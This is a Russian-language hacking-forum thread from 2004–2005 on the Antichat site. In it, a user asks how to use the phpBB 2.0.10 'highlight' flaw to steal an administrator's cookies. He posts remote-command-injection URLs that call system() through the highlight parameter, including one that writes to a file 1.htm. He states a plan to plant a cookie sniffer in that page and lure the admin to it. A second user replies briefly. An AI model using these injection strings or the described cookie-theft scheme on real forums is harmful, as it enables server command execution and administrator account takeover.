ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу Возможно ли в phpBB(2.0.10) использовать xss и получить админские куки?
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Возможно ли в phpBB(2.0.10) использовать xss и получить админские куки?
  #1  
Старый 31.12.2004, 17:58
Аватар для virgoz
virgoz
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
Провел на форуме:
621131

Репутация: 47
Отправить сообщение для virgoz с помощью ICQ
По умолчанию Возможно ли в phpBB(2.0.10) использовать xss и получить админские куки?
Можно ли как-нить с помошью последней уязвимости в phpBB(2.0.10) использовать xss и получить админские куки?
Я пробовал так:
Цитата:
viewtopic.php?t=6&highlight=%2527.system($_GET[id]).%2527&id=echo test!!! и
с обычным текстом все получалось, а вот если вставить например <img src="">, то уже ниче не пишется
 
Ответить с цитированием

  #2  
Старый 02.01.2005, 19:30
Аватар для illusion
illusion
Новичок
Регистрация: 07.12.2004
Сообщений: 27
Провел на форуме:
0

Репутация: 0
Отправить сообщение для illusion с помощью ICQ
По умолчанию
Ну и увидишь это только ты! Смысл то какой?! Echo ничего не даст!
 
Ответить с цитированием

  #3  
Старый 02.01.2005, 22:08
Аватар для virgoz
virgoz
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
Провел на форуме:
621131

Репутация: 47
Отправить сообщение для virgoz с помощью ICQ
По умолчанию
Цитата:
Ну и увидишь это только ты! Смысл то какой?! Echo ничего не даст!
Я немного не так написал:
Цитата:
viewtopic.php?t=6&highlight=%2527.system($_GET[id]).%2527&id=echo 'test!!!' >> 1.htm
Так я думаю моя идея понятна: Записываем снифер в файл 1.htm, а потом травим адина на эту "Новогоднюю Страничку"
Вопрос в том, почему не пропускаются символы <>.
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
как получить админские сессии в Ipb 2.0.4? Danya Форумы 23 10.12.2005 20:23
Аудит аутентификации на Web-сайтах. Часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:20
Как можно получить куки ? VARVAR E-Mail 9 07.06.2005 02:22



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ